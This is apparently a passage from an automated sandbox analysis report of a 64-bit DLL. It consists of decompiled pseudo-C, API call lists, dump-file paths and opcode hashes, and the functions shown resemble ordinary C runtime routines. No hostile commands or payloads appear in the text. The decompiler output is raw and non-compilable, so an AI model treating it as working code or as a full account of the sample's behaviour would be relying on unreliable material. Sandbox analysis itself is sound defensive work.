                                                                                                      				r15d = __ecx;
                                                                                                      				_t90 =  *0x7c17e008; // 0xb442f0549439
                                                                                                      				_t76 = _t75 | 0xffffffff;
                                                                                                      				_t72 = _t90 ^  *(0x7ff87c100000 + 0x7f840 + _t104 * 8);
                                                                                                      				asm("dec eax");
                                                                                                      				if (_t72 == _t76) goto 0x7c10da36;
                                                                                                      				if (_t72 == 0) goto 0x7c10d959;
                                                                                                      				_t57 = _t72;
                                                                                                      				goto 0x7c10da38;
                                                                                                      				if (__r8 == __r9) goto 0x7c10da1b;
                                                                                                      				_t61 =  *((intOrPtr*)(0x7ff87c100000 + 0x7f7a0 + __rsi * 8));
                                                                                                      				if (_t61 == 0) goto 0x7c10d980;
                                                                                                      				if (_t61 != _t76) goto 0x7c10da75;
                                                                                                      				goto 0x7c10da07;
                                                                                                      				r8d = 0x800;
                                                                                                      				LoadLibraryExW(_t104, _t99, _t96);
                                                                                                      				if (_t57 != 0) goto 0x7c10da55;
                                                                                                      				if (GetLastError() != 0x57) goto 0x7c10d9f5;
                                                                                                      				_t14 = _t57 - 0x50; // -80
                                                                                                      				_t37 = _t14;
                                                                                                      				r8d = _t37;
                                                                                                      				if (E00007FF87FF87C10F5B0(_t90) == 0) goto 0x7c10d9f5;
                                                                                                      				r8d = _t37;
                                                                                                      				if (E00007FF87FF87C10F5B0(_t90) == 0) goto 0x7c10d9f5;
                                                                                                      				r8d = 0;
                                                                                                      				LoadLibraryExW(_t93, _t75);
                                                                                                      				if (_t57 != 0) goto 0x7c10da55;
                                                                                                      				 *((intOrPtr*)(0x7ff87c100000 + 0x7f7a0 + __rsi * 8)) = _t76;
                                                                                                      				if (__r8 + 4 != __r9) goto 0x7c10d962;
                                                                                                      				_t91 =  *0x7c17e008; // 0xb442f0549439
                                                                                                      				asm("dec eax");
                                                                                                      				 *(0x7ff87c100000 + 0x7f840 + _t104 * 8) = _t76 ^ _t91;
                                                                                                      				return 0;
                                                                                                      			}

















                                                                                                      0x7ff87c10d8f0
                                                                                                      0x7ff87c10d8f5
                                                                                                      0x7ff87c10d8fa
                                                                                                      0x7ff87c10d90c
                                                                                                      0x7ff87c10d927
                                                                                                      0x7ff87c10d92e
                                                                                                      0x7ff87c10d938
                                                                                                      0x7ff87c10d940
                                                                                                      0x7ff87c10d946
                                                                                                      0x7ff87c10d94f
                                                                                                      0x7ff87c10d951
                                                                                                      0x7ff87c10d954
                                                                                                      0x7ff87c10d95c
                                                                                                      0x7ff87c10d965
                                                                                                      0x7ff87c10d970
                                                                                                      0x7ff87c10d975
                                                                                                      0x7ff87c10d97b
                                                                                                      0x7ff87c10d98d
                                                                                                      0x7ff87c10d993
                                                                                                      0x7ff87c10d99f
                                                                                                      0x7ff87c10d9ae
                                                                                                      0x7ff87c10d9b0
                                                                                                      0x7ff87c10d9b0
                                                                                                      0x7ff87c10d9b6
                                                                                                      0x7ff87c10d9c7
                                                                                                      0x7ff87c10d9c9
                                                                                                      0x7ff87c10d9dd
                                                                                                      0x7ff87c10d9df
                                                                                                      0x7ff87c10d9e7
                                                                                                      0x7ff87c10d9f3
                                                                                                      0x7ff87c10d9ff
                                                                                                      0x7ff87c10da0e
                                                                                                      0x7ff87c10da14
                                                                                                      0x7ff87c10da28
                                                                                                      0x7ff87c10da2e
                                                                                                      0x7ff87c10da54

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.320772134.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.320766962.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.320862895.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321029693.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321047059.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321052496.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321064370.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff87c100000_loaddll64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressFreeLibraryProc
                                                                                                      • String ID: api-ms-$ext-ms-
                                                                                                      • API String ID: 3013587201-537541572
                                                                                                      • Opcode ID: 0c6698adf364fca3294d1cea9b6c9e04e4170ebc5fe981ec924076e30e6001fe
                                                                                                      • Instruction ID: 4c3cbc1e504a4d60f1e049d2256ded040fdada6cbea09bb01e0dcb3da6345185
                                                                                                      • Opcode Fuzzy Hash: 0c6698adf364fca3294d1cea9b6c9e04e4170ebc5fe981ec924076e30e6001fe
                                                                                                      • Instruction Fuzzy Hash: 3341AE23B29A4285FB15EB16D8053B62391BF47BE0F498136DD2D4B788EE3CE4C58320
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.320772134.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.320766962.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.320862895.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321029693.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321047059.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321052496.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321064370.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff87c100000_loaddll64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Value$ErrorLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 2506987500-0
                                                                                                      • Opcode ID: 2a24962a4ae2edce6784a866bb76ad44041d802b6157795572d3a238faec6782
                                                                                                      • Instruction ID: 80a424895681d867c81a52222bb853e404ff1093eb4691efde65ce0aaf5b6ffa
                                                                                                      • Opcode Fuzzy Hash: 2a24962a4ae2edce6784a866bb76ad44041d802b6157795572d3a238faec6782
                                                                                                      • Instruction Fuzzy Hash: 89215B62F2CA4686FB68A721D5453396182BF4B7F4F144634ED7E07AD6DE2CF4C18620
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.320772134.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.320766962.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.320862895.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321029693.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321047059.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321052496.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321064370.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff87c100000_loaddll64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                      • String ID: CONOUT$
                                                                                                      • API String ID: 3230265001-3130406586
                                                                                                      • Opcode ID: f8beb9e43c57309afe536eff65cc898a76b098485244b241a9a6a9293252ff3c
                                                                                                      • Instruction ID: 7a3e5adab5fde616b247f183709989285ca944d60bf3f3bcc9fff519aa56da56
                                                                                                      • Opcode Fuzzy Hash: f8beb9e43c57309afe536eff65cc898a76b098485244b241a9a6a9293252ff3c
                                                                                                      • Instruction Fuzzy Hash: B0119323B28A51C6F7908B16E84432966A4FB89FE8F044335EE5D87B94DF3CD484C754
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF87C10B429,?,?,?,?,00007FF87C110426,?,?,00000000,00007FF87C10D8B7,?,?,?), ref: 00007FF87C10BA5B
                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF87C10B429,?,?,?,?,00007FF87C110426,?,?,00000000,00007FF87C10D8B7,?,?,?), ref: 00007FF87C10BA91
                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF87C10B429,?,?,?,?,00007FF87C110426,?,?,00000000,00007FF87C10D8B7,?,?,?), ref: 00007FF87C10BABE
                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF87C10B429,?,?,?,?,00007FF87C110426,?,?,00000000,00007FF87C10D8B7,?,?,?), ref: 00007FF87C10BACF
                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF87C10B429,?,?,?,?,00007FF87C110426,?,?,00000000,00007FF87C10D8B7,?,?,?), ref: 00007FF87C10BAE0
                                                                                                      • SetLastError.KERNEL32(?,?,?,00007FF87C10B429,?,?,?,?,00007FF87C110426,?,?,00000000,00007FF87C10D8B7,?,?,?), ref: 00007FF87C10BAFB
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.320772134.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.320766962.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.320862895.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321029693.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321047059.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321052496.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321064370.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff87c100000_loaddll64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Value$ErrorLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 2506987500-0
                                                                                                      • Opcode ID: e0883a567a9e29bbbb1b83d6b87fb9bd1dcc803791e6801ea57a03ec04fde850
                                                                                                      • Instruction ID: 6be05e1d7656206d69ddab185e0ec927d5693ecaa137744bc9df44600a2bc8b6
                                                                                                      • Opcode Fuzzy Hash: e0883a567a9e29bbbb1b83d6b87fb9bd1dcc803791e6801ea57a03ec04fde850
                                                                                                      • Instruction Fuzzy Hash: 74116A22B2C64686FB24A761D5563392282BF4B7F4F188635E83E077C6DE2CF4C18620
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.320772134.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.320766962.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.320862895.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321029693.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321047059.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321052496.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321064370.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff87c100000_loaddll64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                      • Opcode ID: b9ddca252de5587d32854ed20271dee5b9467b0203a57a46f89d53908150ef97
                                                                                                      • Instruction ID: b3bcdf616dc2931572b4e2379616dae0799146dc33e65fd8d22cbcb586441fb5
                                                                                                      • Opcode Fuzzy Hash: b9ddca252de5587d32854ed20271dee5b9467b0203a57a46f89d53908150ef97
                                                                                                      • Instruction Fuzzy Hash: FAF0FF62A2960281FB148B24E45437A6360FF8A7E5F544236D96E4B6E4DF2CD5C98720
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 85%
                                                                                                      			E00007FF87FF87C10EB68(signed int __ecx, long long __rbx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
                                                                                                      				signed int _t27;
                                                                                                      				signed int _t28;
                                                                                                      				signed int _t29;
                                                                                                      				signed int _t30;
                                                                                                      				signed int _t31;
                                                                                                      				signed int _t42;
                                                                                                      				signed int _t43;
                                                                                                      				signed int _t44;
                                                                                                      				signed int _t46;
                                                                                                      				void* _t51;
                                                                                                      
                                                                                                      				_a8 = __rbx;
                                                                                                      				_a16 = __rsi;
                                                                                                      				_t27 = __ecx & 0x0000001f;
                                                                                                      				if ((__ecx & 0x00000008) == 0) goto 0x7c10eb9a;
                                                                                                      				if (sil >= 0) goto 0x7c10eb9a;
                                                                                                      				E00007FF87FF87C111CEC(_t27, _t51);
                                                                                                      				_t28 = _t27 & 0xfffffff7;
                                                                                                      				goto 0x7c10ebf1;
                                                                                                      				_t42 = 0x00000004 & dil;
                                                                                                      				if (_t42 == 0) goto 0x7c10ebb5;
                                                                                                      				asm("dec eax");
                                                                                                      				if (_t42 >= 0) goto 0x7c10ebb5;
                                                                                                      				E00007FF87FF87C111CEC(_t28, _t51);
                                                                                                      				_t29 = _t28 & 0xfffffffb;
                                                                                                      				goto 0x7c10ebf1;
                                                                                                      				_t43 = dil & 0x00000001;
                                                                                                      				if (_t43 == 0) goto 0x7c10ebd1;
                                                                                                      				asm("dec eax");
                                                                                                      				if (_t43 >= 0) goto 0x7c10ebd1;
                                                                                                      				E00007FF87FF87C111CEC(_t29, _t51);
                                                                                                      				_t30 = _t29 & 0xfffffffe;
                                                                                                      				goto 0x7c10ebf1;
                                                                                                      				_t44 = dil & 0x00000002;
                                                                                                      				if (_t44 == 0) goto 0x7c10ebf1;
                                                                                                      				asm("dec eax");
                                                                                                      				if (_t44 >= 0) goto 0x7c10ebf1;
                                                                                                      				if ((dil & 0x00000010) == 0) goto 0x7c10ebee;
                                                                                                      				E00007FF87FF87C111CEC(_t30, _t51);
                                                                                                      				_t31 = _t30 & 0xfffffffd;
                                                                                                      				_t46 = dil & 0x00000010;
                                                                                                      				if (_t46 == 0) goto 0x7c10ec0b;
                                                                                                      				asm("dec eax");
                                                                                                      				if (_t46 >= 0) goto 0x7c10ec0b;
                                                                                                      				E00007FF87FF87C111CEC(_t31, _t51);
                                                                                                      				return 0 | (_t31 & 0xffffffef) == 0x00000000;
                                                                                                      			}













                                                                                                      0x7ff87c10eb68
                                                                                                      0x7ff87c10eb6d
                                                                                                      0x7ff87c10eb7c
                                                                                                      0x7ff87c10eb84
                                                                                                      0x7ff87c10eb89
                                                                                                      0x7ff87c10eb90
                                                                                                      0x7ff87c10eb95
                                                                                                      0x7ff87c10eb98
                                                                                                      0x7ff87c10eb9f
                                                                                                      0x7ff87c10eba2
                                                                                                      0x7ff87c10eba4
                                                                                                      0x7ff87c10eba9
                                                                                                      0x7ff87c10ebab
                                                                                                      0x7ff87c10ebb0
                                                                                                      0x7ff87c10ebb3
                                                                                                      0x7ff87c10ebb5
                                                                                                      0x7ff87c10ebb9
                                                                                                      0x7ff87c10ebbb
                                                                                                      0x7ff87c10ebc0
                                                                                                      0x7ff87c10ebc7
                                                                                                      0x7ff87c10ebcc
                                                                                                      0x7ff87c10ebcf
                                                                                                      0x7ff87c10ebd1
                                                                                                      0x7ff87c10ebd5
                                                                                                      0x7ff87c10ebd7
                                                                                                      0x7ff87c10ebdc
                                                                                                      0x7ff87c10ebe2
                                                                                                      0x7ff87c10ebe9
                                                                                                      0x7ff87c10ebee
                                                                                                      0x7ff87c10ebf1
                                                                                                      0x7ff87c10ebf5
                                                                                                      0x7ff87c10ebf7
                                                                                                      0x7ff87c10ebfc
                                                                                                      0x7ff87c10ec03
                                                                                                      0x7ff87c10ec21

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.320772134.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.320766962.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.320862895.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321029693.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321047059.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321052496.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321064370.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff87c100000_loaddll64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _set_statfp
                                                                                                      • String ID:
                                                                                                      • API String ID: 1156100317-0
                                                                                                      • Opcode ID: fc2f76716917edeea79f2d35986c40ea1bb698eb9e2e32f596387757052cb74d
                                                                                                      • Instruction ID: aa226e7bd02db46b5f8a706456061da0ecc3e3afd8c89608282ff50eff9c10f4
                                                                                                      • Opcode Fuzzy Hash: fc2f76716917edeea79f2d35986c40ea1bb698eb9e2e32f596387757052cb74d
                                                                                                      • Instruction Fuzzy Hash: 5F11BF37E3EA2B42F764916AE55637914407F5B3E0F158634F9BF172D68E2CA8C14124
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • FlsGetValue.KERNEL32(?,?,?,00007FF87C109403,?,?,00000000,00007FF87C10969E,?,?,?,?,?,00007FF87C10962A), ref: 00007FF87C10BB33
                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF87C109403,?,?,00000000,00007FF87C10969E,?,?,?,?,?,00007FF87C10962A), ref: 00007FF87C10BB52
                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF87C109403,?,?,00000000,00007FF87C10969E,?,?,?,?,?,00007FF87C10962A), ref: 00007FF87C10BB7A
                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF87C109403,?,?,00000000,00007FF87C10969E,?,?,?,?,?,00007FF87C10962A), ref: 00007FF87C10BB8B
                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF87C109403,?,?,00000000,00007FF87C10969E,?,?,?,?,?,00007FF87C10962A), ref: 00007FF87C10BB9C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.320772134.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.320766962.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.320862895.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321029693.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321047059.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321052496.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321064370.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff87c100000_loaddll64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Value
                                                                                                      • String ID:
                                                                                                      • API String ID: 3702945584-0
                                                                                                      • Opcode ID: 57e8c6263882d169d07007314577b448fa717f22d551fcd21a9fd8724e606022
                                                                                                      • Instruction ID: 646411174aa8abff9234eac569797c57fe366ec61646e9d19a64a7b0269850e6
                                                                                                      • Opcode Fuzzy Hash: 57e8c6263882d169d07007314577b448fa717f22d551fcd21a9fd8724e606022
                                                                                                      • Instruction Fuzzy Hash: 67113D12F2C64646FB68E725D952B7961827F467F0F188734D83E077DADE2CE4C18620
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.320772134.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.320766962.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.320862895.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321029693.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321047059.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321052496.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321064370.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff87c100000_loaddll64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Value
                                                                                                      • String ID:
                                                                                                      • API String ID: 3702945584-0
                                                                                                      • Opcode ID: 210bbf59f21d8c1aaa94cd5aecfdcc31976e6e74a34733d271c34024d620d784
                                                                                                      • Instruction ID: de7b1bb8e9b27ac6fb60b82f7b43eb93e478d6476d499980c04beff4a647d68c
                                                                                                      • Opcode Fuzzy Hash: 210bbf59f21d8c1aaa94cd5aecfdcc31976e6e74a34733d271c34024d620d784
                                                                                                      • Instruction Fuzzy Hash: C3119612A2960686FB68E625D45637911817F4B7E4E184A35E93E0B3D2DE2CB4C19634
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 49%
                                                                                                      			E00007FF87FF87C110958(void* __ecx, signed int __edx, void* __esi, void* __ebp, void* __esp, long long __rbx, intOrPtr* __rcx, long long __r8) {
                                                                                                      				void* __rdi;
                                                                                                      				void* __rsi;
                                                                                                      				void* __rbp;
                                                                                                      				intOrPtr _t181;
                                                                                                      				signed int _t186;
                                                                                                      				signed int _t193;
                                                                                                      				signed int _t198;
                                                                                                      				void* _t212;
                                                                                                      				signed char _t213;
                                                                                                      				void* _t263;
                                                                                                      				signed long long _t264;
                                                                                                      				signed long long _t267;
                                                                                                      				long long _t269;
                                                                                                      				signed long long _t271;
                                                                                                      				long long _t276;
                                                                                                      				long long _t278;
                                                                                                      				long long _t280;
                                                                                                      				intOrPtr* _t289;
                                                                                                      				intOrPtr _t294;
                                                                                                      				long long _t295;
                                                                                                      				long long _t318;
                                                                                                      				void* _t326;
                                                                                                      				long long _t327;
                                                                                                      				void* _t328;
                                                                                                      				long long _t329;
                                                                                                      				long long _t331;
                                                                                                      				signed char* _t332;
                                                                                                      				signed char* _t333;
                                                                                                      				signed char* _t334;
                                                                                                      				intOrPtr* _t335;
                                                                                                      				void* _t336;
                                                                                                      				void* _t337;
                                                                                                      				signed long long _t338;
                                                                                                      				intOrPtr _t341;
                                                                                                      				signed long long _t343;
                                                                                                      				void* _t345;
                                                                                                      				intOrPtr* _t347;
                                                                                                      				intOrPtr _t351;
                                                                                                      				signed long long _t356;
                                                                                                      				signed long long _t359;
                                                                                                      				signed long long _t361;
                                                                                                      				void* _t364;
                                                                                                      				long long _t365;
                                                                                                      				long long _t367;
                                                                                                      				char _t368;
                                                                                                      				void* _t372;
                                                                                                      				signed char* _t373;
                                                                                                      				signed long long _t375;
                                                                                                      
                                                                                                      				_t263 = _t337;
                                                                                                      				_t336 = _t263 - 0x57;
                                                                                                      				_t338 = _t337 - 0xe0;
                                                                                                      				 *((long long*)(_t336 - 9)) = 0xfffffffe;
                                                                                                      				 *((long long*)(_t263 + 8)) = __rbx;
                                                                                                      				_t264 =  *0x7c17e008; // 0xb442f0549439
                                                                                                      				 *(_t336 + 0x17) = _t264 ^ _t338;
                                                                                                      				 *((long long*)(_t336 - 0x49)) = __r8;
                                                                                                      				_t289 = __rcx;
                                                                                                      				_t367 =  *((intOrPtr*)(_t336 + 0x7f));
                                                                                                      				 *((long long*)(_t336 - 0x51)) = _t367;
                                                                                                      				 *(_t336 - 0x19) = __edx;
                                                                                                      				_t267 = __edx >> 6;
                                                                                                      				 *(_t336 - 0x59) = _t267;
                                                                                                      				 *(_t336 - 0x11) = __edx;
                                                                                                      				_t375 = __edx + __edx * 8;
                                                                                                      				_t269 =  *((intOrPtr*)( *((intOrPtr*)(0x7ff87c100000 + 0x7f940 + _t267 * 8)) + 0x28 + _t375 * 8));
                                                                                                      				 *((long long*)(_t336 - 0x29)) = _t269;
                                                                                                      				r12d = r9d;
                                                                                                      				_t365 = _t364 + __r8;
                                                                                                      				 *((long long*)(_t336 - 0x71)) = _t365;
                                                                                                      				 *((intOrPtr*)(_t336 - 0x61)) = GetConsoleOutputCP();
                                                                                                      				if ( *((intOrPtr*)(_t367 + 0x28)) != dil) goto 0x7c1109f8;
                                                                                                      				0x7c109140();
                                                                                                      				_t294 =  *((intOrPtr*)(_t367 + 0x18));
                                                                                                      				r8d =  *(_t294 + 0xc);
                                                                                                      				 *(_t336 - 0x5d) = r8d;
                                                                                                      				 *((long long*)(__rcx)) = _t269;
                                                                                                      				 *((intOrPtr*)(__rcx + 8)) = 0;
                                                                                                      				if ( *((intOrPtr*)(_t336 - 0x49)) - _t365 >= 0) goto 0x7c110db8;
                                                                                                      				_t271 = __edx >> 6;
                                                                                                      				 *(_t336 - 0x21) = _t271;
                                                                                                      				 *((char*)(_t338 + 0x40)) =  *((intOrPtr*)(__r8));
                                                                                                      				 *((intOrPtr*)(_t336 - 0x7d)) = 0;
                                                                                                      				r12d = 1;
                                                                                                      				if (r8d != 0xfde9) goto 0x7c110bc0;
                                                                                                      				_t347 = 0x3e + _t375 * 8 +  *((intOrPtr*)(0x7ff87c100000 + 0x7f940 + _t271 * 8));
                                                                                                      				if ( *_t347 == dil) goto 0x7c110a74;
                                                                                                      				_t372 = _t329 + 1;
                                                                                                      				if (_t372 - 5 < 0) goto 0x7c110a61;
                                                                                                      				if (_t372 == 0) goto 0x7c110b52;
                                                                                                      				r12d =  *((char*)(_t294 + 0x7ff87c17e8f0));
                                                                                                      				r12d = r12d + 1;
                                                                                                      				_t181 = r12d - 1;
                                                                                                      				 *((intOrPtr*)(_t336 - 0x69)) = _t181;
                                                                                                      				_t341 = _t181;
                                                                                                      				if (_t341 -  *((intOrPtr*)(_t336 - 0x71)) - __r8 > 0) goto 0x7c110d27;
                                                                                                      				_t295 = _t329;
                                                                                                      				 *((char*)(_t336 + _t295 - 1)) =  *_t347;
                                                                                                      				if (_t295 + 1 - _t372 < 0) goto 0x7c110ab9;
                                                                                                      				if (_t341 <= 0) goto 0x7c110aea;
                                                                                                      				E00007FF87FF87C1064D0( *( *((intOrPtr*)(0x7ff87c100000 + 0x7f940 +  *(_t336 - 0x59) * 8)) + 0x3e + _t375 * 8) & 0x000000ff, 0, __esi, __esp, _t336 - 1 + _t372, __r8, _t329, __r8, _t341);
                                                                                                      				_t318 = _t329;
                                                                                                      				 *((intOrPtr*)( *((intOrPtr*)(0x7ff87c100000 + 0x7f940 +  *(_t336 - 0x59) * 8)) + _t318 + 0x3e + _t375 * 8)) = dil;
                                                                                                      				if (_t318 + 1 - _t372 < 0) goto 0x7c110aed;
                                                                                                      				 *((long long*)(_t336 - 0x41)) = _t329;
                                                                                                      				_t276 = _t336 - 1;
                                                                                                      				 *((long long*)(_t336 - 0x39)) = _t276;
                                                                                                      				_t186 = (0 | r12d == 0x00000004) + 1;
                                                                                                      				r12d = _t186;
                                                                                                      				r8d = _t186;
                                                                                                      				 *((long long*)(_t338 + 0x20)) = _t367;
                                                                                                      				E00007FF87FF87C111744(_t276, _t289, _t336 - 0x7d, _t336 - 0x39, _t341, _t336 - 0x41);
                                                                                                      				if (_t276 == 0xffffffff) goto 0x7c110db8;
                                                                                                      				_t331 = __r8 +  *((intOrPtr*)(_t336 - 0x69)) - 1;
                                                                                                      				goto 0x7c110c55;
                                                                                                      				_t368 =  *((char*)(_t276 + 0x7ff87c17e8f0));
                                                                                                      				_t212 = _t368 + 1;
